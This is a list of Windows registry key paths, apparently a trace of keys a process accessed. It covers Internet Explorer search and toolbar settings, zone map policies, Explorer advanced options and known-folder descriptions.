HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF52}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{04C18CCF-1F57-4CBD-88CC-3900F5195CE3}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\CommandBar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseIE7AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchControlWidth
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigrated
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedInstalled
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedDefaultName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SearchMigratedDefaultURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\provider
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Deleted
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ShowSearchSuggestions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ShowSearchSuggestions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsGlobal
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsGlobal
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSONFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSONFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURLFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\PreviewURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Codepage
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\Codepage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SortIndex
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\LinksBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\TestHandler
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\LinksFolderMigrate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\MarketingLinksMigrate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Path
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Handler
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\FeedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\CascadeFolderBands
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\CascadeFolderBands
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\DefaultItemWidth
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
